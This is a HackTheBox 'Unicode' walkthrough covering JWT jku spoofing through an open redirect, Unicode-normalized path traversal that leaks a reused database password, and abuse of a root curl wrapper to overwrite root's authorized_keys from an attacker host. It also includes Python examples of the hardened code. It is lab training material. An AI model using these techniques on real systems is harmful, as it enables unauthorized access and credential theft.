
HackTheBox – Unicode Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -sV -T4 -Pn 10.10.11.126

http://10.10.11.126/

Browsing around turns up a lot of forms, file uploads and so on, but after testing them I found nothing conclusive.

Click on Buy Now, then on Checkout under the middle plan.

The site hands us a JWT in a cookie; decoding it shows the alg header is RS256.

RS256 means asymmetric keys: the token is signed with the server's RSA private key and checked against the matching public key, which the server publishes in a JWKS (JSON Web Key Set) file; the token's jku header tells the verifier where to fetch that file. The site hosts its key set under /static/, and I can pull it with the following command:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# curl hackmedia.htb/static/jwks.json

One last detail: a JWT is normally sent in an Authorization header, but here the site stores it in a cookie.

Since the verifier fetches its keys from wherever jku points, we can switch to the admin account by JWKS spoofing: sign a token with a key we control and make the server fetch a key set that contains our public key. First, generate an RSA key pair with the same parameters as the site's jwks.json (RS256, same key size). I used the following site:

https://mkjwk.org/

Then I write a jwks.json with the same structure as the original, keeping its fields but replacing the modulus n (and e, if it differs) with the values of our freshly generated key, and serve it from our machine (10.10.14.102).

Next, I edit the cookie in a JWT debugger such as jwt.io. First the jku: the server evidently only accepts a key-set URL under its own /static/ path, so rather than pointing jku straight at our host I keep that prefix, step out of it with /../ and land on the site's /redirect?url= endpoint, which bounces the server's fetch to our machine. The jku therefore ends in:

/../redirect?url=10.10.14.102/jwks.json

Then I paste our public and private keys into the Verify Signature box so the token is re-signed with our private key.

Finally I change the user claim to admin.

Header:

{
  "typ": "JWT",
  "alg": "RS256",
  "jku": "http://hackmedia.htb/static/../redirect?url=10.10.14.102/jwks.json"
}

Payload:

{
  "user": "admin"
}

Public and private keys

Public:

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz+BE72Y6Az4btntZTzGu
DiyerjxoGZ3FDjDgh/hSkJ3uPsANvQLyvcX2saHg/IMWMXAg5y4irUOt0LNkjp56
8G5OTEWJMdUZHYUu0ohz17Ggcij8QZF7mE+O39kGpZfZLQI3xyV6rtHVHGGoxxFS
HKe8F31TpYkHa+KECp4W7g+tIKUpAnf4P0M3vhfbA6MPsNCzm1gvr4wg1VmRZDCC
kXaeZQ7Hzx0Gg14zu49/ZujL8h40J1oxLbkJ81GX9T0nx6I1C/zMeizUGn9F7vR/
wJGzKj03F+2JJBdDkWHbr6gYvmVkpbomRfayd4iRwpTk8PL79XSZCUFga+sdM+C4
BQIDAQAB
-----END PUBLIC KEY-----

Private:

-----BEGIN PRIVATE KEY-----
[private key body not reproduced]
-----END PRIVATE KEY-----

Final Cookie:

eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9oYWNrbWVkaWEuaHRiL3N0YXRpYy8uLi9yZWRpcmVjdD91cmw9MTAuMTAuMTQuMTAyL2p3a3MuanNvbiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.pm_EMYYW7GBm6iGe31_5tjMa_qB7zloEy46UaLaNKSiQ89SD7OH51ppk0k1QgUTOx3d2WiVnHhQkc3KZTH_Twye2NAjT-0kgULr3m9sjNe1AjbtgvEmebLRsxSEaAkjfsYSOGMW1hh5i7e1AO324hn0VRQYUM7ur_Cr4DBJk6b18VVjzs6Bo-zrtqdZD_0Bu_OaOyq9WToy8A0j1b0uS3nHJ30f1nC8ufrwe8JYErZeNJ5rTQpNcKxa0sSWa7xtmmrkUEU3DrPiFhSLiaI7OzEAKFCkxCQ9KoKkA0uvjhsIPTVbIT4b3cCpBHymwCdVhdaPIw02SCBxTIedyu5DE9g

With the new cookie in hand, I replace the old value in the browser and refresh the page: I now have access to the admin interface.

In the admin panel, click Current Report, intercept the request and put our forged JWT in the cookie. The report is fetched through a page parameter:

http://10.10.11.126/display/?page=monthly.pdf

That parameter is a file name, and a plain ../ is filtered out. The application normalizes Unicode after that check, though, and U+FE30 (︰, %EF%B8%B0 in UTF-8) normalizes to "..", so the filter never sees the traversal:

http://10.10.11.126/display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/etc/passwd

The same trick, unencoded, reads the application's database configuration:

http://10.10.11.126/display/?page=︰/︰/︰/︰/︰/︰/︰/home/code/coder/db.yaml

We get this:

mysql_host: "localhost"
mysql_user: "code"
mysql_password: "B3stC0d3r2021@@!"
mysql_db: "user"
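Why the bypass works, as an added example (mine, not the application's code): the first resolver mimics a viewer that applies a ../ blocklist to the raw parameter and Unicode-normalizes it afterwards; the second normalizes first and then checks that the resolved path stays under the base directory. The payload is the writeup's own ?page= value; the base directory and both resolvers are assumptions. The last function generalizes the trick by scanning for every code point whose NFKC form is "..".

```python
"""Why ︰/ (U+FE30) walks up the directory tree on this box.

Added example, not the site's code. PAYLOAD_RAW is the writeup's ?page=
value exactly as sent; BASE_DIR and the two resolvers are assumptions
about how such a viewer is written, not the target's source.
"""
import posixpath
import unicodedata
from urllib.parse import unquote

PAYLOAD_RAW = "%EF%B8%B0/" * 7 + "etc/passwd"   # constructed from the writeup's URL
BASE_DIR = "/srv/hackmedia/reports"              # assumption; not on the page


def nfkc(s):
    return unicodedata.normalize("NFKC", s)


def raw_filter_rejects(page):
    """The kind of check a '../' blocklist makes on the value as received."""
    return "../" in page or page.startswith("/") or "\x00" in page


def vulnerable_resolve(base, page):
    """Checks first, normalizes Unicode afterwards: ︰ becomes '..' too late."""
    page = unquote(page)
    if raw_filter_rejects(page):
        return None
    return posixpath.normpath(posixpath.join(base, nfkc(page)))


def hardened_resolve(base, page):
    """Decode and normalize first, then keep only paths that stay under base."""
    page = nfkc(unquote(page))
    if "\x00" in page:
        return None
    full = posixpath.normpath(posixpath.join(base, page))
    if posixpath.commonpath([base, full]) != base:
        return None
    return full


def dotdot_lookalikes():
    """Every code point (outside the surrogate range) whose NFKC form is '..'."""
    return sorted(chr(c) for c in range(0x80, 0x110000)
                  if not 0xD800 <= c <= 0xDFFF and nfkc(chr(c)) == "..")


if __name__ == "__main__":
    print(vulnerable_resolve(BASE_DIR, PAYLOAD_RAW))
    print(hardened_resolve(BASE_DIR, PAYLOAD_RAW))
    print(hardened_resolve(BASE_DIR, "monthly.pdf"))
    print([f"U+{ord(c):04X}" for c in dotdot_lookalikes()])
```

The order of operations is the whole bug: any canonicalization (URL decoding, Unicode normalization, case folding) that happens after a blocklist check turns the check into decoration. Normalize once, resolve the path, and compare the result against the allowed directory.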

The database password is reused for the code user's SSH login:

┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh code@10.10.11.126
Password: B3stC0d3r2021@@!

code@code:~$ cat user.txt

code@code:~$ sudo -l

sudo -l (output was a screenshot) shows a reporting tool we may run as root. One of its menu options asks for an "IP/file_name" and evidently hands the answer to curl: the -K and -o switches below are curl's. Given a file name with -K in front, curl reads that file as its config file and warns about every line it does not understand, echoing the line back, which leaks the flag:

Enter the IP/file_name:-K/root/root.txt

For a root shell, pick option 3 and make curl overwrite root's authorized_keys with a public key served from our machine. The answer is a single input field, so bash brace expansion is used to produce three separate words: the shell expands the braces before curl runs, and curl receives the URL, -o and the output path as three arguments:

Enter your choice:3

Enter the IP/file_name:{10.10.14.102/authorized_keys,-o,/root/.ssh/authorized_keys}
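How the braces turn one answer into three curl arguments, as an added example (mine; the report tool's code is not on the page): a stand-in wrapper pastes the answer into a shell command line the way a program using os.system would, with printf in place of curl so that each output line is one argument curl would have received. The input filter is an assumption that models why the writeup reaches for braces rather than spaces; the hardened variant shows the pattern that closes the hole.

```python
"""Why {url,-o,path} gives the root-only report tool three curl arguments.

Added example, not the tool's code. The wrapper is a stand-in for a program
that pastes the answer to its prompt into a shell command line; printf
stands in for curl, so each output line is one argv entry. The filter is an
assumption that models why braces are used rather than spaces.
"""
import subprocess

AUTHORIZED_KEYS_TRICK = "{10.10.14.102/authorized_keys,-o,/root/.ssh/authorized_keys}"
ROOT_TXT_TRICK = "-K/root/root.txt"
FAKE_CURL = "printf '%s\\n'"   # stand-in for curl: prints one argv entry per line


def filter_accepts(value):
    """Assumed input check: no whitespace or shell separators in the answer."""
    return not any(ch in value for ch in " \t\n;|&$`")


def vulnerable_fetch(value):
    """os.system style: 'curl <value>' is built as text and re-parsed by bash,
    so brace expansion splits {a,b,c} into separate words before curl runs."""
    if not filter_accepts(value):
        return None
    out = subprocess.run(["bash", "-c", f"{FAKE_CURL} {value}"],
                         capture_output=True, text=True, check=True)
    return out.stdout.splitlines()


def hardened_fetch(value):
    """The answer travels as a positional parameter, never as command text, so it
    stays one argument; '--' stops curl from reading a leading -K or -o as an option."""
    if not filter_accepts(value):
        return None
    out = subprocess.run(["bash", "-c", f'{FAKE_CURL} "$@"', "curl", "--", value],
                         capture_output=True, text=True, check=True)
    return out.stdout.splitlines()


if __name__ == "__main__":
    for trick in (AUTHORIZED_KEYS_TRICK, ROOT_TXT_TRICK):
        print("vulnerable:", vulnerable_fetch(trick))
        print("hardened:  ", hardened_fetch(trick))
```

Note that the -K case needs no expansion at all: a single argument beginning with a dash is already an option to curl. Blocking spaces does nothing against either; building an argv list (or passing the value after "--") does.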

With our public key now in root's authorized_keys, log in as root with the matching private key from the attacking machine:

┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh root@10.10.11.126 -i /root/.ssh/id_rsa

Hi, I’m saksham dixit
